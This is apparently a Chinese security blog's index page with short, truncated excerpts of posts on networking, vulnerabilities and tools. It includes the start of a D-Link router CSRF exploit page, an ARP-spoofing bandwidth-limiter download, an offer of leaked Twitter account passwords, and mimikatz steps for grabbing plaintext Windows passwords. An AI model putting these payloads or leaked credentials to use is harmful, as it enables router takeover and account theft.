python-nmap是一个python的库,python2.x使用的是python-nmap-0.1.4,使用过程中遇到一点问题。记录如下:
错误信息:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "D:\opt\Python27\lib\multiprocessing\forking.py", line 373, in main
prepare(preparation_data)[......]
这个工具比p2p终结者什么的有用多了,虽然是09年的东西了,原理还是不过时的哟,采用欺骗网关的方式来达到限速的目的,目前市面上各种版本各种说法的都有,大多都是捆毒的下载站,下面的是官方的下载站,绝对不忽悠。
下载地址:
http://www.cncert.net/up_files/soft/skiller3.70.rar
原地址失效,我传到了百度网盘:
http://pan.baidu.com/share/link?shareid=125145&uk=2905237318
注意:
需要安装.net 2.0 + winpcap (htt[……]
Flash播放器的漏洞,出来有几天了,补丁地址:
https://www.adobe.com/support/security/bulletins/apsb12-09.html
发布日期:2012-05-04
更新日期:2012-05-07
受影响系统:
Adobe Flash Player 11.x
Adobe Flash Player 10.x
不受影响系统:
Adobe Flash Player 11.2.202.235
Adobe Flash Player 11.1.115.8
Adobe Flash Player 11.1.111.9
编号是CVE-[……]
winbox在MkroTik的官方网站有下载,自己搜一下就好了,最近用到这个软路由,记录一下教程,算是一个RouterOS的简单教程说明吧。
MikroTik RouterOS 内能通过远程配置各种参数,包括Telnet,SSH,WinBox 和 Webbox。在这里我们将着重介绍怎样使用 WinBox:
MAC-telnet 是在路由器没有IP 地址的情况下或者配置防火墙参数后无法连接,通过路由器网卡MAC 地址登录的方式远程连接到路由器。MAC-telnet 仅能使用在来自同一个广播域中(因此在网络中不能有路由的存在),且路由器的网卡应该被[……]
D-Link的路由器很多都有这种漏洞,不只这一款,冰山一角而已,把下面代码保存为html文件就可以了。
<html> <body onload="javascript:document.forms[0].submit()"> <H2>Please Wait While Redirecting to PPoE Page </H2> <form method="POST" name="form0" action="http://192.168.1.1/wizi[......]
5月9日消息,据国外媒体报道,昨天Twitter成千上万的用户账号密码和电邮地址遭曝光,目前还不清楚涉事者的身份,另外Twitter称其中涉及大量重复账号和已被停用的垃圾账号,因此确切的受影响的账号数也不清楚。
有很多重复的账号,从pastebin上面把泄露的账号密码都弄下来了,解压密码:nigesb.com,下载地址:
有人对泄露的账号进行了分析,结果如下:
---- Statistics of the "55.000 leaked Twitter accounts". Note[......]
微软发布了ms12-032的补丁:
http://technet.microsoft.com/en-us/security/bulletin/ms12-032
这个补丁是与TCP/IP协议有关的一个栈溢出问题,可以导致本地提权,目前微软已经要求StackOverflow.com移除这些代码。
老外是这么说的,尝试绑定一个IPV6-mapped IPV4 address,目前只能到crash down
We discovered that running our application under certain conditions results in Windo[......]
今天玩ISCC2012,遇到了关键字的内容,经过hhjack大神提醒,终于过关,总结一下各数据库的关键字转义。
Mysql对于关键字转义的做法是用`这个符号来进行,例如:
insert into app (name,`key`,secret) values ('aa','bb',null);
Access以及sqlserver对于关键字转义的做法是使用中括号,例如:
Select * from [key] where id=1;
昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。
咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz
mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,管理员身份运行:
//开始运行神器 mimikatz //提[......]
这个东西是之前的Chinaunix里面的ppt,现在做成了一个pdf共享出来,讲得还是很详细的,还介绍了iptables里面的一些插件等。以后可以做查找只用,不过版本关系可能有些新版上面的系统某些命令还是变了,大家自己参考一下吧,嘿嘿。
下载地址:
最新评论